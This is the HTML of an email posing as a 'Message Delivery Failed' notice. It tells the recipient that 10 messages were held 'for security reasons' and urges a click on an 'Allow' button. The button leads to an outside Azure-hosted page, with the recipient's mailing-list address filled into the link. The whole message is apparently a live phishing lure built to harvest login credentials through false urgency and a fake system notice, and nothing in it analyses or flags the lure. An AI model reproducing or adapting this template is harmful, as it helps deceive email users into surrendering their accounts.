<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Message Delivery Failed</title>
<style>
body {
font-family: Arial, sans-serif;
text-align: center;
background-color: #f0f0f0;
}
.container {
margin-top: 100px;
padding: 20px;
border-radius: 10px;
background-color: #ffffff;
box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.1);
width: 70%;
margin-left: auto;
margin-right: auto;
}
h1 {
color: #333333;
}
p {
color: #666666;
margin-bottom: 20px;
}
button {
padding: 10px 20px;
font-size: 16px;
border: none;
border-radius: 5px;
background-color: #4CAF50;
color: #ffffff;
cursor: pointer;
transition: background-color 0.3s ease;
align: center;
width:55%;
}
button:hover {
background-color: #45a049;
}
</style>
</head>
<body style="font-family: Arial, sans-serif;
text-align: center;
background-color: #f0f0f0">
<div style="margin-top: 100px;
padding: 20px;
border-radius: 10px;
background-color: #ffffff;
box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.1);
width: 70%;
margin-left: auto;
margin-right: auto" class="container">
<h1 style="color: #333333">Message Delivery Failed</h1>
<p style="color: #666666;
margin-bottom: 20px">We regret to inform you that 10 messages failed to deliver due to security reasons.</p>
<p style="color: #666666;
margin-bottom: 20px">To enable successful delivery, please click the button below:</p>
<a href="https://zealous-river-09c72a610.5.azurestaticapps.net/?eml=pkg-pascal-devel@lists.alioth.debian.org" target="_blank"><button style="padding: 10px 20px;
font-size: 16px;
border: none;
border-radius: 5px;
background-color: #4CAF50;
color: #ffffff;
cursor: pointer;
transition: background-color 0.3s ease;
align: center;
width:55%">Allow</button></a>
</div>
</body></html>